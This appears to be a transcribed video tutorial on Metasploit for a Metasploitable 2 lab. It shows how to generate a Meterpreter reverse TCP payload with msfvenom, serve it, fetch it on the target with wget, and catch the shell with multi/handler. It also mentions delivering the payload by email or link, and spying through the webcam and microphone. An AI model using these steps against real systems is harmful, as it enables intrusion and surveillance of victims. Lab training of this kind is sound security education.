Hey, what's up guys? Today I'll be teaching you guys how to use Metasploit and how to create a payload, a interpreter payload, and how to actually use interpreter. So to get right into it, you first need to download the payload. Before you download the payload, you will need to know what operating system your target is running on. So today I'll be testing the payload on Metasploitable 2, which is a Linux, which is using the Linux operating system. So I would use MSF Venom, and actually the command is right here. I would use MSF Venom -p to specify the payload, and I would use Linux x86, which is a 32-bit operating system, and typically you would use 32-bit if you don't know what operating system your target, the kind of bit your target's operating system is running on, because 32-bit runs on both 32-bit and 64-bit, and 64-bit won't be able to run on a 32-bit system, so you would typically choose 32-bit to be safer. And I'll use interpreter, and I'll be using reverse TCP. I'll be using a reverse shell, so reverse TCP. I will specify my L host, which is my local host, which is the IP address of your hacking machine, your own machine, and the L port, which is the port that you want to listen to connection on, and then -f to specify the type of file, the type of executable file. So ELF is like a Linux executable file format, and if you're using it on Windows, it will be exe, and I'll use -o to specify the name of the file that I want to output the payload to. And after I run this, just a little slow right now, and you guys can see it successfully downloaded the payload, and it's saved as hack.txt. Now if I cat hack. You guys can see it's actually a bunch of gibberish because it's like a binary. So right now I would serve. Typically you would want your target to download the payload either by email or either by downloading a link and visiting a website. So, but for this tutorial, I'll just be setting up a Python server and downloading. Using my target machine and downloading using wget. So I would just do python -3-m http server and 80 to specify the port. Now it's serving. I'll just use the command wget http://192.168.183.131 /hack.txt to specify what file I want to get. Now I successfully downloaded the file, and it actually saved as hack.txt.1 because I have another exact file that's in this current directory right now, but that's fine. And I'll just cmod it so that way it's an executable. And now I'll go back to my hacking machine and close the server because we don't need it anymore, and use MSF console. And run the command use multi handler. That's because you use multi-handler when you're using a interpreter shell, and since we're using a interpreter shell, we'll use multi-handler. So yeah, and you will specify the payload, which is the payload that we set before, which is Linux x86 / interpreter / reverse TCP. Now we successfully set the payload. You will set the, I will also show you guys this option, the show option command. Show options. And right now we can see like the basic configuration of our payload. So the payload is set to this. We just got to set the L host and L port to the one that we set before. So set L port, L host first, 192.168.183.131. Set L port to 1337. And now everything's all set. We just gotta use the command run. And now we just gotta run the file. And after we run the file, we successfully have control of our target machine. And now if I do ls-l, we can see our target machine's directory. And if we do ls-l here, you guys can actually see it's the same thing. But so okay, and there's actually like a lot of things that we can do with after we successfully uploaded interpreter shell. Like we can look at their webcam, we can listen to their audio, like what they're saying, we can like execute commands, we can like terminate processes, we can create files, create directories, and we basically have full control of our target machine once we successfully uploaded the file. And this is actually pretty dangerous, but you can mitigate just by not clicking on random links, not visiting websites that you don't trust, and not executing files that you don't know about. And always keep your firewall and antivirus up to date. So this is a basic introduction to Metasploit, and thank you guys for watching. I'll see you guys next time.